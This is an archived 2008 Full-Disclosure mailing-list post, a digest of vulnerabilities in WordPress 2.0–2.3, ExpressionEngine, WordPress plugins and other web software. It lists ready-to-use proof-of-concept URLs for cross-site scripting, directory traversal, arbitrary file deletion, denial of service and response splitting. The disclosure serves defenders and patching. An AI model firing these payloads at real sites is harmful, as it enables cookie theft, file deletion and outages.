[Full-disclosure] securityvulns.com russian vulnerabilities digest

From: 3APA3A <3APA3A_at_nospam>
Date: Thu Jan 03 2008 - 20:50:08 GMT
To: bugtraq <bugtraq@securityfocus.com>

Dear bugtraq,

Below is a digest of vulnerabilities published by http://securityvulns.com/ and believed to be previously unpublished in English. All vulnerabilities were reported by MustLive
(http://websecurity.com.ua/).

AwesomeTemplateEngine Crossite scripting

Multiple crossite scripting (require register_globvals): http://site/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Original article (in Russian): http://securityvulns.ru/Sdocument784.html Additional details (in Ukrainian): http://websecurity.com.ua/1694/

2. Wordpress multiple security vulnerabilities:

2.1 information disclosure (WordPress 2.2/2.3)

Invalid request disclosures database structure and local paths:

http://site/?feed=rss2&p=1

Original article (in Russian): http://securityvulns.ru/Sdocument663.html Additional details (in Ukrainian): http://websecurity.com.ua/1634/

2.2 crossite scripting (WordPress <= 2.0.9)

http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22 http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22

Original article (in Russian): http://securityvulns.ru/Sdocument714.html Additional details (in Ukrainian): http://websecurity.com.ua/1658/

2.3 Directory traversal, Arbitrary file deletion, Denial of Service and Cross-Site Scripting via wp-db-backup.php

Directory Traversal (WordPress <= 2.0.3): http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

Arbitrary file deletion and DoS (WordPress <= 2.0.3): http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php

XSS (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x):

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Original article (in Russian): http://securityvulns.ru/Sdocument755.html Additional details (in Ukrainian): http://websecurity.com.ua/1676/

2.4 Local file include, Directory traversal and Full path disclosure
(WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x)

Arbitrary file edit:

http://site/wp-admin/templates.php?file=\..\..\file

Attacks with backslash are possible in Windows version.

Original article (in Russian): http://securityvulns.ru/Sdocument762.html http://securityvulns.ru/Sdocument768.html http://securityvulns.ru/Sdocument773.html http://securityvulns.ru/Sdocument772.html Additional detail (in Ukrainian): http://websecurity.com.ua/1679/ http://websecurity.com.ua/1683/ http://websecurity.com.ua/1686/ http://websecurity.com.ua/1687/

3. Crossite scripting and Denial of Service in PRO-Search <= 0.17

Denial of Service:

http://site/?show_page=20000&time=0

Original article (in Russian): http://securityvulns.ru/Sdocument731.html Additional details (in Ukrainian): http://websecurity.com.ua/1259/

4. Persistant crossite scripting and request forgery in WP-ContactForm <= 1.5 alpha (WordPress plugin)

POST request to

http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php

with different form fields.

5. RotaBanner Local <= 3 crossite scripting

http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Original article (in Russian): http://securityvulns.ru/Sdocument625.html Additional details (in Ukrainian): http://websecurity.com.ua/1442/

6. ExpressionEngine <= 1.2.1 response splitting and crossite scripting

http://site/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E

Original article (in Russian): http://securityvulns.ru/Sdocument472.html Additional details (in Ukrainian): http://websecurity.com.ua/1454/

-=-=-=-

There are also few vulnerabilities published in English as a part of the Month of Bugs in CAPTCHA:

Cryptographp <= 1.2 WordPress plugin multiple persistant crossite scriptings

Original article: http://websecurity.com.ua/1596/

XSS in Math Comment Spam Protection < 2.2

Original article: http://websecurity.com.ua/1576/

XSS in Captcha! <= 2.5d

Original article: http://websecurity.com.ua/1588/ -- http://securityvulns.com/ /\_/\ { , . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +-------------o66o--+ / |/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

This message: [ Message body ]
Next message: reepex: "Re: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]"
Previous message: 3APA3A: "[Full-disclosure] multiple CAPTCHA automation test bypass digest"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ]